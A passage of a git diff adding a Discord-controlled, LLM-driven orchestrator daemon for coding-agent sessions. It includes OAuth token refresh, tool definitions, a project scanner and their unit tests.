MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('get_status', {}, 'Status: alpha is running'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'status' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'Status: alpha is running'); + }); + + it('handles empty session list', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('get_status', {}, 'No sessions running'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [] }); + const msg = makeMessage({ content: 'status' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'No sessions running'); + }); + }); + + // ---- stop_session tool ---- + + describe('stop_session tool', () => { + it('stops session matched by sessionId', async () => { + const session = makeMockSession({ sessionId: 'sess-abc', projectName: 'alpha' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'stop_session', + { identifier: 'sess-abc' }, + 'Stopped alpha', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'stop sess-abc' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 1); + assert.equal(sessionManager.cancelSessionCalls[0], 'sess-abc'); + }); + + it('fuzzy matches by project name', async () => { + const session = makeMockSession({ sessionId: 'sess-xyz', projectName: 'my-big-project' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'stop_session', + { identifier: 'big-project' }, + 'Stopped my-big-project', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'stop big project' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 1); + assert.equal(sessionManager.cancelSessionCalls[0], 'sess-xyz'); + }); + + it('returns not-found for unmatched identifier', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'stop_session', + { identifier: 'nonexistent' }, + 'No session found', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [] }); + const msg = makeMessage({ content: 'stop nonexistent' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 0); + }); + }); + + // ---- get_session_detail tool ---- + + describe('get_session_detail tool', () => { + it('returns formatted session detail', async () => { + const session = makeMockSession({ sessionId: 'sess-detail' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'get_session_detail', + { sessionId: 'sess-detail' }, + 'Session details for my-project', + ), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'detail sess-detail' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'Session details for my-project'); + }); + }); + + // ---- Message routing / auth guards ---- + + describe('handleMessage routing', () => { + it('ignores bot messages', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ bot: true, content: 'hello from bot' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores non-owner messages', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ authorId: 'stranger-456', content: 'hack the planet' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores messages from non-control channels', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ channelId: 'random-channel', content: 'hello' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores empty message content', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: ' ' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + }); + + it('routes valid message through LLM and sends response', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: 'hello orchestrator' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 1); + assert.equal(msg.sentMessages.length, 1); + assert.equal(msg.sentMessages[0], 'Mock LLM response'); + }); + }); + + // ---- Conversation history ---- + + describe('conversation history', () => { + it('accumulates user and assistant entries', async () => { + const { orchestrator } = makeOrchestrator(); + + await orchestrator.handleMessage(makeMessage({ content: 'first' })); + await orchestrator.handleMessage(makeMessage({ content: 'second' })); + + const history = orchestrator.getHistory(); + assert.equal(history.length, 4); // 2 user + 2 assistant + assert.equal(history[0]!.role, 'user'); + assert.equal(history[1]!.role, 'assistant'); + assert.equal(history[2]!.role, 'user'); + assert.equal(history[3]!.role, 'assistant'); + }); + + it('trims to MAX_HISTORY (30) by removing oldest pairs', async () => { + const { orchestrator } = makeOrchestrator(); + + // Send 17 messages → 34 history entries (17 user + 17 assistant) + // After trimming: should be ≤30 + for (let i = 0; i < 17; i++) { + await orchestrator.handleMessage(makeMessage({ content: `msg-${i}` })); + } + + const history = orchestrator.getHistory(); + assert.ok(history.length <= 30, `History length ${history.length} exceeds 30`); + // Should have trimmed from the front — oldest entries gone + // 34 entries → trim 2 at a time until ≤30 → 30 entries (trimmed 4) + assert.equal(history.length, 30); + }); + }); + + // ---- Error handling ---- + + describe('error handling', () => { + it('sends error message to Discord when LLM API throws', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.errorHandler('API rate limit exceeded'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'hello' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages.length, 1); + assert.ok(msg.sentMessages[0]!.includes('Something went wrong')); + }); + + it('appends error placeholder to history on LLM failure', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.errorHandler('Network error'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + await orchestrator.handleMessage(makeMessage({ content: 'fail' })); + + const history = orchestrator.getHistory(); + assert.equal(history.length, 2); // user + error assistant + assert.equal(history[1]!.role, 'assistant'); + assert.equal(history[1]!.content, '[error — see logs]'); + }); + }); + + // ---- stop() ---- + + describe('stop()', () => { + it('clears conversation history and nulls client', async () => { + const { orchestrator } = makeOrchestrator(); + + await orchestrator.handleMessage(makeMessage({ content: 'hello' })); + assert.ok(orchestrator.getHistory().length > 0); + + orchestrator.stop(); + assert.equal(orchestrator.getHistory().length, 0); + }); + }); + + // ---- Tool execution direct tests ---- + + describe('tool execution (via agent loop)', () => { + it('list_projects returns empty message when no projects', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'No projects'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, projects: [] }); + const msg = makeMessage({ content: 'list' }); + await orchestrator.handleMessage(msg); + + // The second create call receives the tool result + assert.equal(mockClient.createCallCount, 2); + }); + + it('start_session with optional command passes through', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'start_session', + { projectPath: '/p', command: '/gsd quick fix tests' }, + 'Started', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'start with custom command' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.startSessionCalls.length, 1); + assert.equal(sessionManager.startSessionCalls[0]!.command, '/gsd quick fix tests'); + }); + }); + +}); diff --git a/packages/daemon/src/orchestrator.ts b/packages/daemon/src/orchestrator.ts new file mode 100644 index 000000000..678874cec --- /dev/null +++ b/packages/daemon/src/orchestrator.ts @@ -0,0 +1,544 @@ +/** + * Orchestrator — LLM-powered agent for the #gsd-control Discord channel. + * + * Receives Discord messages, maintains conversation history, calls the + * Anthropic messages API with 5 tool definitions (list_projects, start_session, + * get_status, stop_session, get_session_detail), and sends the LLM's response + * back to Discord. + * + * Uses the standard messages.create() tool-use loop (not betaZodTool helpers, + * which don't exist in SDK v0.52). Zod schemas are used for input validation + * at the tool execution layer. + */ + +import { z } from 'zod'; +import { readFileSync, writeFileSync, chmodSync } from 'node:fs'; +import { join } from 'node:path'; +import { homedir } from 'node:os'; +import type Anthropic from '@anthropic-ai/sdk'; +import type { + MessageParam, + ContentBlockParam, + Tool, + ToolResultBlockParam, + ToolUseBlock, + TextBlock, +} from '@anthropic-ai/sdk/resources/messages/messages'; +import type { SessionManager } from './session-manager.js'; +import type { ChannelManager } from './channel-manager.js'; +import type { ProjectInfo, ManagedSession } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// OAuth token resolution — reads GSD's auth.json, refreshes if expired +// --------------------------------------------------------------------------- + +interface OAuthCredentials { + type: 'oauth'; + refresh: string; + access: string; + expires: number; +} + +const TOKEN_URL = 'https://platform.claude.com/v1/oauth/token'; +const CLIENT_ID = atob('OWQxYzI1MGEtZTYxYi00NGQ5LTg4ZWQtNTk0NGQxOTYyZjVl'); + +/** + * Read the Anthropic OAuth access token from GSD's auth.json. + * If expired, refresh it and write the new credentials back. + * Falls back to ANTHROPIC_API_KEY env var if no OAuth credential exists. + */ +async function resolveAnthropicApiKey(logger?: Logger): Promise { + // Try env var first (explicit override) + if (process.env.ANTHROPIC_API_KEY) { + return process.env.ANTHROPIC_API_KEY; + } + + const authPath = join(homedir(), '.gsd', 'agent', 'auth.json'); + let authData: Record; + try { + authData = JSON.parse(readFileSync(authPath, 'utf-8')); + } catch { + throw new Error( + 'No Anthropic auth found. Run `gsd login` to authenticate, or set ANTHROPIC_API_KEY.', + ); + } + + const cred = authData.anthropic as OAuthCredentials | undefined; + if (!cred || cred.type !== 'oauth' || !cred.access) { + throw new Error( + 'No Anthropic OAuth credential in auth.json. Run `gsd login` to authenticate.', + ); + } + + // If token is still valid, use it + if (Date.now() < cred.expires) { + return cred.access; + } + + // Token expired — refresh it + logger?.info('orchestrator: refreshing Anthropic OAuth token'); + const response = await fetch(TOKEN_URL, { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ + grant_type: 'refresh_token', + client_id: CLIENT_ID, + refresh_token: cred.refresh, + }), + signal: AbortSignal.timeout(30_000), + }); + + if (!response.ok) { + const error = await response.text(); + throw new Error(`Anthropic token refresh failed: ${error}`); + } + + const data = (await response.json()) as { + access_token: string; + refresh_token: string; + expires_in: number; + }; + + const newCred: OAuthCredentials = { + type: 'oauth', + refresh: data.refresh_token, + access: data.access_token, + expires: Date.now() + data.expires_in * 1000 - 5 * 60 * 1000, + }; + + // Write back to auth.json + authData.anthropic = newCred; + writeFileSync(authPath, JSON.stringify(authData, null, 2), 'utf-8'); + chmodSync(authPath, 0o600); + logger?.info('orchestrator: Anthropic OAuth token refreshed'); + + return newCred.access; +} + +// --------------------------------------------------------------------------- +// Configuration +// --------------------------------------------------------------------------- + +export interface OrchestratorConfig { + model: string; + max_tokens: number; + control_channel_id: string; +} + +export interface OrchestratorDeps { + sessionManager: SessionManager; + channelManager: ChannelManager; + scanProjects: () => Promise; + config: OrchestratorConfig; + logger: Logger; + ownerId: string; +} + +// --------------------------------------------------------------------------- +// System Prompt +// --------------------------------------------------------------------------- + +const SYSTEM_PROMPT = `You are GSD Control — a concise, capable orchestrator for managing GSD (Get Shit Done) coding agent sessions via Discord. + +You have tools to list projects, start sessions, get status, stop sessions, and inspect session details. Use them to fulfill the user's requests. + +Response guidelines: +- Be terse and direct. No filler, no performed enthusiasm. +- When reporting status, use bullet points with project name, status, duration, and cost. +- When starting a session, confirm with the project name and session ID. +- When stopping a session, confirm which session was stopped. +- If something fails, say what went wrong plainly. +- Use Discord markdown formatting (bold, code blocks) for readability. +- Never expose internal error stack traces to the user — summarize the issue.`; + +// --------------------------------------------------------------------------- +// Tool Definitions (Anthropic API format) +// --------------------------------------------------------------------------- + +const TOOLS: Tool[] = [ + { + name: 'list_projects', + description: 'List all detected projects across configured scan roots. Returns project names, paths, and detected markers (git, node, gsd, etc.).', + input_schema: { + type: 'object' as const, + properties: {}, + required: [], + }, + }, + { + name: 'start_session', + description: 'Start a new GSD auto-mode session for a project. Provide the absolute project path. Optionally provide a command to run instead of the default "/gsd auto".', + input_schema: { + type: 'object' as const, + properties: { + projectPath: { type: 'string', description: 'Absolute path to the project directory' }, + command: { type: 'string', description: 'Optional command to send instead of "/gsd auto"' }, + }, + required: ['projectPath'], + }, + }, + { + name: 'get_status', + description: 'Get the current status of all active GSD sessions. Shows project name, status, duration, and cost for each.', + input_schema: { + type: 'object' as const, + properties: {}, + required: [], + }, + }, + { + name: 'stop_session', + description: 'Stop a running GSD session. Provide a session ID or project name — fuzzy matching is used to find the session.', + input_schema: { + type: 'object' as const, + properties: { + identifier: { type: 'string', description: 'Session ID or project name to match' }, + }, + required: ['identifier'], + }, + }, + { + name: 'get_session_detail', + description: 'Get detailed information about a specific session including cost breakdown, recent events, pending blockers, and error state.', + input_schema: { + type: 'object' as const, + properties: { + sessionId: { type: 'string', description: 'The session ID to inspect' }, + }, + required: ['sessionId'], + }, + }, +]; + +// --------------------------------------------------------------------------- +// Zod schemas for tool input validation +// --------------------------------------------------------------------------- + +const StartSessionInput = z.object({ + projectPath: z.string(), + command: z.string().optional(), +}); + +const StopSessionInput = z.object({ + identifier: z.string(), +}); + +const GetSessionDetailInput = z.object({ + sessionId: z.string(), +}); + +// --------------------------------------------------------------------------- +// Conversation History Cap +// --------------------------------------------------------------------------- + +const MAX_HISTORY = 30; + +// --------------------------------------------------------------------------- +// Orchestrator +// --------------------------------------------------------------------------- + +export class Orchestrator { + private readonly deps: OrchestratorDeps; + private client: Anthropic | null; + private history: MessageParam[] = []; + + /** + * @param deps - orchestrator dependencies (session manager, channel manager, etc.) + * @param client - optional Anthropic client for testability; if omitted, created from env + */ + constructor(deps: OrchestratorDeps, client?: Anthropic) { + this.deps = deps; + this.client = client ?? null; + } + + /** + * Lazily initialise the Anthropic client. Dynamic import handles K007 module resolution. + * Resolves auth from GSD's OAuth credentials (auth.json), refreshing if needed. + */ + private async getClient(): Promise { + if (this.client) return this.client; + const apiKey = await resolveAnthropicApiKey(this.deps.logger); + const { default: AnthropicSDK } = await import('@anthropic-ai/sdk'); + this.client = new AnthropicSDK({ apiKey }); + return this.client; + } + + /** + * Handle an incoming Discord message. Entry point called by the bot's + * message handler for every message in every channel. + * + * Guards: ignores bot messages, non-owner messages, and non-control-channel messages. + */ + async handleMessage(message: DiscordMessageLike): Promise { + // Ignore bot messages + if (message.author.bot) return; + + // Ignore non-control-channel messages + if (message.channelId !== this.deps.config.control_channel_id) return; + + // Auth guard — only the owner can use the orchestrator + if (message.author.id !== this.deps.ownerId) { + this.deps.logger.debug('orchestrator auth rejected', { userId: message.author.id }); + return; + } + + const content = message.content?.trim(); + if (!content) return; + + this.deps.logger.info('orchestrator message received', { + userId: message.author.id, + channelId: message.channelId, + contentLength: content.length, + }); + + // Append user message to history + this.history.push({ role: 'user', content }); + + try { + // Show typing indicator while processing + await message.channel.sendTyping().catch(() => {}); + + const responseText = await this.runAgentLoop(); + + // Send response to Discord + await message.channel.send(responseText); + + this.deps.logger.info('orchestrator response sent', { + channelId: message.channelId, + responseLength: responseText.length, + }); + } catch (err) { + const errorMsg = err instanceof Error ? err.message : String(err); + + // Invalidate cached client on auth errors so next call re-resolves OAuth token + if (errorMsg.includes('authentication') || errorMsg.includes('apiKey') || errorMsg.includes('authToken') || errorMsg.includes('401')) { + this.client = null; + } + + this.deps.logger.error('orchestrator error', { + error: errorMsg, + userId: message.author.id, + channelId: message.channelId, + }); + + // Send error feedback to Discord + try { + await message.channel.send('⚠️ Something went wrong processing your request.'); + } catch (sendErr) { + this.deps.logger.warn('orchestrator error reply failed', { + error: sendErr instanceof Error ? sendErr.message : String(sendErr), + }); + } + + // Still append a synthetic assistant message so history stays paired + this.history.push({ role: 'assistant', content: '[error — see logs]' }); + } + + this.trimHistory(); + } + + /** + * Run the tool-use loop: call messages.create(), execute any tool calls, + * feed results back, repeat until the model produces a final text response. + */ + private async runAgentLoop(): Promise { + const client = await this.getClient(); + const { model, max_tokens } = this.deps.config; + + let loopMessages: MessageParam[] = [...this.history]; + const maxIterations = 10; // safety valve + + for (let i = 0; i < maxIterations; i++) { + const response = await client.messages.create({ + model, + max_tokens, + system: SYSTEM_PROMPT, + tools: TOOLS, + messages: loopMessages, + }); + + // If the model stopped for end_turn (no tool calls), extract text and return + if (response.stop_reason === 'end_turn' || response.stop_reason !== 'tool_use') { + const textBlocks = response.content.filter( + (b): b is TextBlock => b.type === 'text', + ); + const finalText = textBlocks.map((b) => b.text).join('\n') || '(No response)'; + + // Append assistant message to conversation history + this.history.push({ role: 'assistant', content: finalText }); + + return finalText; + } + + // Model wants to use tools — execute them all + const toolUseBlocks = response.content.filter( + (b): b is ToolUseBlock => b.type === 'tool_use', + ); + + // Build tool results + const toolResults: ToolResultBlockParam[] = []; + for (const toolUse of toolUseBlocks) { + const result = await this.executeTool(toolUse.name, toolUse.input as Record); + toolResults.push({ + type: 'tool_result', + tool_use_id: toolUse.id, + content: result, + }); + } + + // Append the assistant message (with tool_use blocks) and user tool_result message + loopMessages = [ + ...loopMessages, + { role: 'assistant', content: response.content as ContentBlockParam[] }, + { role: 'user', content: toolResults }, + ]; + } + + // If we hit max iterations, return a fallback + return 'I hit the maximum number of tool iterations. Please try a simpler request.'; + } + + /** + * Execute a single tool by name. Returns a string result for the LLM. + * All errors are caught and returned as error strings (the LLM can reason about them). + */ + private async executeTool(name: string, input: Record): Promise { + try { + switch (name) { + case 'list_projects': + return await this.toolListProjects(); + case 'start_session': + return await this.toolStartSession(input); + case 'get_status': + return this.toolGetStatus(); + case 'get_session_detail': + return this.toolGetSessionDetail(input); + case 'stop_session': + return await this.toolStopSession(input); + default: + return `Unknown tool: ${name}`; + } + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + this.deps.logger.error('tool execution error', { tool: name, error: msg }); + return `Error: ${msg}`; + } + } + + // --------------------------------------------------------------------------- + // Tool implementations + // --------------------------------------------------------------------------- + + private async toolListProjects(): Promise { + const projects = await this.deps.scanProjects(); + if (projects.length === 0) return 'No projects found.'; + return JSON.stringify( + projects.map((p) => ({ name: p.name, path: p.path, markers: p.markers })), + null, + 2, + ); + } + + private async toolStartSession(input: Record): Promise { + const parsed = StartSessionInput.parse(input); + const sessionId = await this.deps.sessionManager.startSession({ + projectDir: parsed.projectPath, + command: parsed.command, + }); + return `Session started: ${sessionId} for ${parsed.projectPath}`; + } + + private toolGetStatus(): string { + const sessions = this.deps.sessionManager.getAllSessions(); + if (sessions.length === 0) return 'No active sessions.'; + + return sessions + .map((s: ManagedSession) => { + const durationMin = Math.floor((Date.now() - s.startTime) / 60_000); + const cost = s.cost.totalCost.toFixed(4); + return `• ${s.projectName} — ${s.status} (${durationMin}m, $${cost})`; + }) + .join('\n'); + } + + private async toolStopSession(input: Record): Promise { + const parsed = StopSessionInput.parse(input); + const { identifier } = parsed; + + // Try exact sessionId match first + const byId = this.deps.sessionManager.getSession(identifier); + if (byId) { + await this.deps.sessionManager.cancelSession(identifier); + return `Stopped session ${identifier} (${byId.projectName})`; + } + + // Fuzzy match by project name + const all = this.deps.sessionManager.getAllSessions(); + const match = all.find( + (s: ManagedSession) => + s.projectName.toLowerCase().includes(identifier.toLowerCase()) || + s.projectDir.toLowerCase().includes(identifier.toLowerCase()), + ); + if (match) { + await this.deps.sessionManager.cancelSession(match.sessionId); + return `Stopped session ${match.sessionId} (${match.projectName})`; + } + + return `No session found matching "${identifier}"`; + } + + private toolGetSessionDetail(input: Record): string { + const parsed = GetSessionDetailInput.parse(input); + const result = this.deps.sessionManager.getResult(parsed.sessionId); + return JSON.stringify(result, null, 2); + } + + // --------------------------------------------------------------------------- + // History management + // --------------------------------------------------------------------------- + + /** + * Trim conversation history to MAX_HISTORY entries. + * Removes the oldest user+assistant pair from the front to keep pairs aligned. + */ + private trimHistory(): void { + while (this.history.length > MAX_HISTORY) { + // Remove from front — two messages at a time to keep user/assistant pairs + this.history.splice(0, 2); + } + } + + /** + * Return a copy of the conversation history (for debugging / observability). + */ + getHistory(): MessageParam[] { + return [...this.history]; + } + + /** + * Stop the orchestrator — clears history and nulls client reference. + */ + stop(): void { + this.history = []; + this.client = null; + } +} + +// --------------------------------------------------------------------------- +// Discord message type (minimal interface for testability) +// --------------------------------------------------------------------------- + +/** + * Minimal Discord message interface — avoids importing discord.js directly, + * making the orchestrator testable without full discord.js mocking. + */ +export interface DiscordMessageLike { + author: { id: string; bot: boolean }; + channelId: string; + content: string; + channel: { + send: (content: string) => Promise; + sendTyping: () => Promise; + }; +} diff --git a/packages/daemon/src/project-scanner.test.ts b/packages/daemon/src/project-scanner.test.ts new file mode 100644 index 000000000..6812c3871 --- /dev/null +++ b/packages/daemon/src/project-scanner.test.ts @@ -0,0 +1,235 @@ +/** + * Tests for the project scanner module. + */ + +import { describe, it, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, chmodSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir, platform } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { scanForProjects } from './project-scanner.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `scanner-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +/** Create a project directory with specified marker files/dirs */ +function createProject(root: string, name: string, markers: string[]): string { + const projDir = join(root, name); + mkdirSync(projDir, { recursive: true }); + for (const marker of markers) { + const markerPath = join(projDir, marker); + if (marker.startsWith('.') && !marker.includes('.')) { + // Likely a directory marker (.git, .gsd) + mkdirSync(markerPath, { recursive: true }); + } else { + // File marker (package.json, Cargo.toml, etc.) + writeFileSync(markerPath, '{}'); + } + } + return projDir; +} + +// ---------- tests ---------- + +describe('scanForProjects', () => { + it('finds projects with marker files', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'my-app', ['.git', 'package.json']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'my-app'); + assert.equal(results[0]!.path, join(root, 'my-app')); + assert.ok(results[0]!.markers.includes('git')); + assert.ok(results[0]!.markers.includes('node')); + assert.ok(results[0]!.lastModified > 0); + }); + + it('handles missing scan_root gracefully', async () => { + const results = await scanForProjects(['/nonexistent/path/that/does/not/exist']); + assert.deepEqual(results, []); + }); + + it('handles permission errors on entries', { skip: platform() === 'win32' ? 'chmod not reliable on Windows' : undefined }, async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + // Create an accessible project + createProject(root, 'accessible', ['.git']); + + // Create an inaccessible directory + const noAccess = join(root, 'locked'); + mkdirSync(noAccess); + chmodSync(noAccess, 0o000); + + const results = await scanForProjects([root]); + + // Restore permissions for cleanup + chmodSync(noAccess, 0o755); + + // Should find the accessible project but skip the locked one + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'accessible'); + }); + + it('detects multiple marker types', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'full-stack', ['.git', 'package.json', '.gsd']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.markers.length, 3); + assert.ok(results[0]!.markers.includes('git')); + assert.ok(results[0]!.markers.includes('node')); + assert.ok(results[0]!.markers.includes('gsd')); + }); + + it('returns results sorted alphabetically by name', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'zebra-project', ['.git']); + createProject(root, 'alpha-project', ['.git']); + createProject(root, 'middle-project', ['.git']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 3); + assert.equal(results[0]!.name, 'alpha-project'); + assert.equal(results[1]!.name, 'middle-project'); + assert.equal(results[2]!.name, 'zebra-project'); + }); + + it('ignores hidden directories', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'visible', ['.git']); + createProject(root, '.hidden', ['.git']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'visible'); + }); + + it('ignores node_modules', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'real-project', ['package.json']); + createProject(root, 'node_modules', ['package.json']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'real-project'); + }); + + it('skips directories with no markers', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'has-markers', ['.git']); + // Create a plain directory with no markers + mkdirSync(join(root, 'no-markers')); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'has-markers'); + }); + + it('scans multiple roots', async () => { + const root1 = tmpDir(); + const root2 = tmpDir(); + cleanupDirs.push(root1, root2); + + createProject(root1, 'proj-a', ['.git']); + createProject(root2, 'proj-b', ['Cargo.toml']); + + const results = await scanForProjects([root1, root2]); + + assert.equal(results.length, 2); + assert.equal(results[0]!.name, 'proj-a'); + assert.ok(results[0]!.markers.includes('git')); + assert.equal(results[1]!.name, 'proj-b'); + assert.ok(results[1]!.markers.includes('rust')); + }); + + it('detects all supported marker types', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'git-proj', ['.git']); + createProject(root, 'node-proj', ['package.json']); + createProject(root, 'gsd-proj', ['.gsd']); + createProject(root, 'rust-proj', ['Cargo.toml']); + createProject(root, 'python-proj', ['pyproject.toml']); + createProject(root, 'go-proj', ['go.mod']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 6); + + const byName = new Map(results.map(r => [r.name, r])); + assert.deepEqual(byName.get('git-proj')!.markers, ['git']); + assert.deepEqual(byName.get('node-proj')!.markers, ['node']); + assert.deepEqual(byName.get('gsd-proj')!.markers, ['gsd']); + assert.deepEqual(byName.get('rust-proj')!.markers, ['rust']); + assert.deepEqual(byName.get('python-proj')!.markers, ['python']); + assert.deepEqual(byName.get('go-proj')!.markers, ['go']); + }); + + it('skips non-directory entries', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'real-project', ['.git']); + // Create a regular file at the root level — should be ignored + writeFileSync(join(root, 'some-file.txt'), 'not a directory'); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'real-project'); + }); + + it('returns empty array for empty scan_roots', async () => { + const results = await scanForProjects([]); + assert.deepEqual(results, []); + }); + + it('deduplicates when same root appears twice', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'only-once', ['.git']); + + const results = await scanForProjects([root, root]); + + // Same directory scanned twice — results will have duplicates + // (this is acceptable; the caller can deduplicate by path if needed) + assert.equal(results.length, 2); + assert.equal(results[0]!.name, 'only-once'); + assert.equal(results[1]!.name, 'only-once'); + }); +}); diff --git a/packages/daemon/src/project-scanner.ts b/packages/daemon/src/project-scanner.ts new file mode 100644 index 000000000..3eb9b5926 --- /dev/null +++ b/packages/daemon/src/project-scanner.ts @@ -0,0 +1,99 @@ +/** + * Project scanner — discovers projects in configured scan_roots by detecting + * marker files/directories. Reads one level deep (immediate children only). + */ + +import { readdir, stat, access } from 'node:fs/promises'; +import { join, basename } from 'node:path'; +import type { ProjectInfo, ProjectMarker } from './types.js'; + +// --------------------------------------------------------------------------- +// Marker file → project type mapping +// --------------------------------------------------------------------------- + +const MARKER_MAP: ReadonlyMap = new Map([ + ['.git', 'git'], + ['package.json', 'node'], + ['.gsd', 'gsd'], + ['Cargo.toml', 'rust'], + ['pyproject.toml', 'python'], + ['go.mod', 'go'], +]); + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +/** + * Scan configured roots for project directories. + * + * Behaviour: + * - Reads immediate children of each root (1 level deep, not recursive) + * - Skips hidden directories (starting with `.`) and `node_modules` + * - Skips missing roots and permission-denied entries gracefully + * - Detects markers via MARKER_MAP; directories with no markers are excluded + * - Results are sorted alphabetically by name + * - lastModified is the most recent mtime among detected marker files/dirs + */ +export async function scanForProjects(scanRoots: string[]): Promise { + const results: ProjectInfo[] = []; + + for (const root of scanRoots) { + let entries: string[]; + try { + entries = await readdir(root); + } catch { + // Missing root or permission error — skip gracefully + continue; + } + + for (const entry of entries) { + // Skip hidden directories and node_modules + if (entry.startsWith('.') || entry === 'node_modules') continue; + + const entryPath = join(root, entry); + + // Must be a directory + let entryStat; + try { + entryStat = await stat(entryPath); + } catch { + // Permission error or disappeared entry — skip + continue; + } + if (!entryStat.isDirectory()) continue; + + // Detect markers + const markers: ProjectMarker[] = []; + let latestMtime = 0; + + for (const [markerFile, markerType] of MARKER_MAP) { + const markerPath = join(entryPath, markerFile); + try { + const markerStat = await stat(markerPath); + markers.push(markerType); + if (markerStat.mtimeMs > latestMtime) { + latestMtime = markerStat.mtimeMs; + } + } catch { + // Marker doesn't exist — not an error + } + } + + // Only include directories with at least one marker + if (markers.length === 0) continue; + + results.push({ + name: basename(entryPath), + path: entryPath, + markers, + lastModified: latestMtime, + }); + } + } + + // Sort alphabetically by name + results.sort((a, b) => a.name.localeCompare(b.name)); + + return results; +} diff --git a/packages/daemon/src/session-manager.test.ts b/packages/daemon/src/session-manager.test.ts new file mode 100644 index 000000000..8adccd670 --- /dev/null +++ b/packages/daemon/src/session-manager.test.ts @@ -0,0 +1,822 @@ +/** + * SessionManager unit tests. + * + * Uses the MockRpcClient + TestableSessionManager pattern (K008) to test + * session lifecycle, event handling, cost tracking, blocker detection, + * and cleanup without spawning real GSD processes. + */ + +import { describe, it, beforeEach, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { resolve, basename } from 'node:path'; +import { 